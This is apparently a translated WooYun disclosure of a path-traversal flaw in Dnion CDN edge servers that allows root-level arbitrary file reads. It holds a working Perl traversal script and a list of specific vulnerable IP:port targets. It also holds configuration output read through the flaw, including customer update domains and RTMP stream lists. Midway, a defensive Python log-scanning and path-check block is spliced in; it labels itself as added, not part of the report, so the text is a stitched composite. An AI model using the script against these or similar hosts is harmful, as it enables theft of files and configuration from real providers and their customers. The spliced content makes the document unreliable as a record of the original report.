
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-099919

Title: A CDN vendor's uniform server misconfiguration can affect Tencent, 360, Battle.net, ZT Game (征途) and other companies

Affected vendor: a certain CDN

Author: 杀器王子

Submitted: 2015-03-06 18:38

Fixed: 2015-04-20 18:40

Published: 2015-04-20 18:40

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-06: details sent to the vendor, awaiting vendor handling
2015-03-11: vendor confirmed; details visible to the vendor only
2015-03-21: details disclosed to core white hats and domain experts
2015-03-31: details disclosed to regular white hats
2015-04-10: details disclosed to intern white hats
2015-04-20: details disclosed to the public

Brief description:

A CDN vendor's uniform server misconfiguration can affect Tencent, 360, Battle.net, ZT Game (征途) and other companies.
From what has been found so far, the affected services include Tencent Video, 360 Safeguard updates, World of Warcraft updates, ZT Game (征途) updates, 11 Platform (11对战平台) updates, Kunlun Games updates, and others.

Detailed description:

http://www.dnion.com/
Dnion CDN
Shanghai Dnion Information Technology Co., Ltd. is a high-tech enterprise dedicated to providing professional Internet platform services, headquartered in Shanghai with registered capital of 48 million yuan. In December 2014 the company was formally listed on the NEEQ (National Equities Exchange and Quotations) under the short name 帝联科技 (Dnion Technology), securities code 831402. Relying on strong capital, a keen sense of the market and a distinctive understanding of next-generation Internet business, together with rich operating experience and a strong sales force, Dnion has rapidly expanded its Internet IDC and CDN business, setting up branches and offices in Beijing, Guangzhou, Shenzhen, Nantong, Chengdu, Changsha and elsewhere, with more than 500 employees; it has extensive experience and many successful cases in building and operating IDC data centers and CDN content delivery networks and in expanding Internet value-added services, and its overall strength ranks among the leaders in the industry.
Ports 1863 and 843 on the CDN servers share the same configuration error, which allows arbitrary file reads with root privileges.
Several dozen IPs are collected below as proof.
After the macOS curl upgrade, curl normalizes "../" away before sending the request, so I wrote a small script instead:

use strict;
use warnings;
use LWP::Simple;

# Usage: perl fetch.pl <ip:port> </absolute/path/to/file>
my ($ip, $file) = @ARGV;
die "usage: $0 <ip:port> </absolute/path/to/file>\n" unless defined $ip && defined $file;

# Build the traversal URL by hand; newer curl builds collapse "../" before sending
my $url = "http://" . $ip . "/../../../../../../../.." . $file;
my $content = get($url);
print $content if defined $content;
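The report does not say what the CDN edge software is or why its file serving resolves "../" above the document root, so the following is an added defensive example, not code from the report or from the vendor: it parses a few constructed nginx-style access-log lines (sample data, not from the report), flags requests whose decoded path contains a ".." segment, marks which of them would have climbed above the document root, and shows the check a file server should apply, resolving the request under a fixed root and refusing anything that lands outside it. The log format, the document root "/srv/www" and the sample paths are all assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (nginx "combined"-like format); not from the report.
SAMPLE_LOG = """\
1.2.3.4 - - [06/Mar/2015:18:38:01 +0800] "GET /update/patch.bin HTTP/1.1" 200 1048576
1.2.3.4 - - [06/Mar/2015:18:38:05 +0800] "GET /../../../../../../../../etc/passwd HTTP/1.1" 200 2201
5.6.7.8 - - [06/Mar/2015:18:38:09 +0800] "GET /%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200 1187
5.6.7.8 - - [06/Mar/2015:18:38:12 +0800] "GET /static/..%2fconfig/nginx.conf HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\d+)'
)


def normalize_request_path(raw_path):
    """Strip the query string and percent-decode twice so that both "%2e%2e"
    and double-encoded "%252e" variants are seen as literal ".." segments."""
    path = raw_path.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def escapes_document_root(raw_path):
    """True if walking the decoded path ever climbs above the directory the
    request is relative to (the document root), i.e. depth goes negative."""
    depth = 0
    for segment in normalize_request_path(raw_path).split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False


def find_traversal_attempts(log_text):
    """Return one record per request whose decoded path carries a '..' segment,
    noting whether it escaped the root and what status the server returned.
    A 200 on an escaping path is the signal that the server actually served it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = normalize_request_path(m["path"])
        if ".." in decoded.split("/"):
            hits.append({
                "ip": m["ip"],
                "path": m["path"],
                "status": int(m["status"]),
                "escaped_root": escapes_document_root(m["path"]),
            })
    return hits


def resolve_under_root(doc_root, raw_path):
    """The server-side check: join the decoded request path onto the document
    root, normalize, and accept only if the result is still inside the root.
    Returns the resolved filesystem path, or None when the request must be refused."""
    root = posixpath.normpath(doc_root)
    relative = normalize_request_path(raw_path).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    prefix = root if root.endswith("/") else root + "/"
    if candidate == root or candidate.startswith(prefix):
        return candidate
    return None


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        verdict = "ESCAPED ROOT" if hit["escaped_root"] else "contained"
        print(f'{hit["ip"]} {hit["status"]} {verdict} {hit["path"]}')
    for request in ("/update/patch.bin", "/../../../../../../../../etc/passwd"):
        print(request, "->", resolve_under_root("/srv/www", request))
```

The log scan is a triage aid: a ".." segment inside the tree (the fourth sample line) is usually harmless, while a ".." that climbs past depth zero and gets a 200 means the server served a file outside its root. The durable fix is the `resolve_under_root` shape: decode, join onto an absolute root, normalize, then compare against the root prefix, so the decision no longer depends on how the client spelled the path.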


[Screenshot: Snip20150306_91.png]


218.92.1.168:1863
218.92.1.169:1863
218.92.1.176:1863
218.92.1.180:1863
218.92.1.182:1863
218.92.1.183:1863
58.222.24.140:1863
60.211.226.22:1863
60.211.226.23:1863
60.211.226.24:1863
60.211.226.34:1863
61.156.241.114:1863
61.156.241.120:1863
61.156.241.16:1863
61.156.241.19:1863
61.156.241.20:1863
61.156.241.22:1863
61.156.241.64:1863
61.156.241.70:1863
61.156.241.73:1863
61.156.241.74:1863
61.156.241.87:1863
61.156.241.89:1863


[Screenshot: Snip20150306_87.png]


[Screenshot: Snip20150306_88.png]


Analysis of the collected IPs shows the following bound domain names:

server_name wotdn.kongzhong.com;
server_name wotpatch.kongzhong.com;
server_name client04.pdl.battlenet.com.cn;
server_name client04.pdl.wow.battlenet.com.cn;
server_name dlleak.360safe.com;
server_name dlleak2.360safe.com;
server_name dlleak3.360safe.com;
server_name dlleak4.360safe.com;
server_name dlleak5.360safe.com;
server_name dlleak6.360safe.com;
server_name m-enop016.dnion.com;
server_name sdgdown.dnion.com;
server_name files2.changyou.com;
server_name filesty.changyou.com;
server_name download1.m3guo.com;
server_name c1.qj.ztgame.com.cn;
server_name dn.apkdata.wandoujia.com;
server_name dn.mir.wandoujia.com;
server_name dn.mir.wdjcdn.com;
server_name download.5211game.com;
server_name download104.wanmei.com;
server_name downloadjs.ztgame.com.cn;
server_name efdown.5211game.com;
server_name efdown2.5211game.com;
server_name files2.changyou.com;
server_name filesty.changyou.com;
server_name ime.cdn.sogou.com;
server_name jgtmdown.5211game.com;
server_name jgtmupdate.5211game.com;
server_name jianghuupdate.ztgame.com.cn;
server_name tera.download2.kunlun.com;
server_name update.5211game.com;
server_name updatezt2jd.ztgame.com.cn;


360 update domain

[Screenshot: Snip20150306_89.png]


World of Warcraft update domain

[Screenshot: Snip20150306_90.png]

Proof of vulnerability:

RTMP live-stream distribution statistics (pull list)

pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/eventlive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/voicelive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/158show;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/58livev;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/5show;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/flive2;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/flive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/gamelive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/ishow520;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/ivp;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/live;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/live_haibian;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/quanshievent;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/show;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/ttshow;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/v1live;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/zhijilive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/158show;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/58livev;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/5show;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/flive2;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/flive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/gamelive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/ishow520;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/ivp;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/live;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/live_haibian;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/quanshievent;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/show;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/ttshow;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/v1live;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/zhijilive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/gamelive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/v1live;
pull rtmp://112.65.233.185/hls;
pull rtmp://222.73.93.58/hls;
pull rtmp://hddxf2.dnionrtmp.com/aodiansoft;
pull rtmp://hddxf2.dnionrtmp.com/live_audio;
pull rtmp://hddxf2.dnionrtmp.com/live_video;
pull rtmp://hddxf2.dnionrtmp.com/livekg;
pull rtmp://hddxf2.dnionrtmp.com/mids;
pull rtmp://hddxf2.dnionrtmp.com/xin189live;
pull rtmp://hddxf2.dnionrtmp.com/zlcx;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/FMServer;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/chat;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/cpbaolive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/cshow;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/dvrlive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/eventlive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/feihuosrc;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/fengyun1;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/fengyun2;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/glive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/ktvdaren;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/live10;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/live_dnion2;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/live_dnion;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livebfd;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livecdn;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livechina;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livecpbao;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livehslt8;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livepkgr;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livesk;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/livestream;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/m1905;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/moli;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/mshow;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/myapp;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/repeater;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/screenlive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/slive live=1;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/swlive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/video;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/videochat;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/voicelive;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/vshow live=1;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/wxbgt;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/xiu8liverepeater;
pull rtmp://hdgdwt4.dnionrtmp.com:1835/zhibo;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/FMServer;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/chat;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/cpbaolive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/cshow;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/dvrlive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/eventlive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/feihuosrc;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/fengyun1;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/fengyun2;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/glive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/ktvdaren;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/live10;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/live_dnion2;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/live_dnion;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livebfd;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livecdn;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livechina;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livecpbao;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livehslt8;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livepkgr;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livesk;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/livestream;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/m1905;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/moli;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/mshow;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/myapp;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/repeater;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/screenlive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/slive live=1;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/swlive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/video;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/videochat;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/voicelive;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/vshow live=1;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/wxbgt;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/xiu8liverepeater;
pull rtmp://hdgdwt7.dnionrtmp.com:1835/zhibo;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/158show;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/58livev;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/5show;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/FMServer;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/chat;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/cpbaolive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/cshow;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/dvrlive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/feihuosrc;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/fengyun1;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/fengyun2;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/flive2;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/flive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/glive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ishow520;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ivp;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ktvdaren;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live10;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live_dnion2;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live_dnion;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/live_haibian;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livebfd;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livecdn;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livechina;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livecpbao;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livehslt8;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livepkgr;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livesk;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/livestream;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/m1905;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/moli;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/mshow;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/myapp;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/quanshievent;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/repeater;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/screenlive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/show;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/slive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/swlive;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/ttshow;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/video;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/videochat;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/vshow live=1;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/wxbgt;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/xiu8liverepeater;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/zhibo;
pull rtmp://hdzjhzdx1.dnionrtmp.com:1835/zhijilive;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/aodiansoft;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/live_audio;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/live_video;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/livekg;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/livexiang;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/mids;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/xin189live;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/yesky;
pull rtmp://hdzjhzwt3.dnionrtmp.com:1835/zlcx;
pull rtmp://hdzjhzwt4.dnionrtmp.com:1835/livereach;
pull rtmp://hdzjhzwt4.dnionrtmp.com:1835/mshowlive;
pull rtmp://qjhywthx229.dnionrtmp.com:1835/liverepeater;
pull rtmp://qjtjdxhx57.dnionrtmp.com:1835/liverepeater;


It is not feasible to go into each one in depth; this only demonstrates the vulnerability.

Fix recommendation:

The specific root cause is unknown.

Copyright notice: please credit the source when reposting, 杀器王子@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-03-11 11:35

Vendor reply:

Latest status:

None yet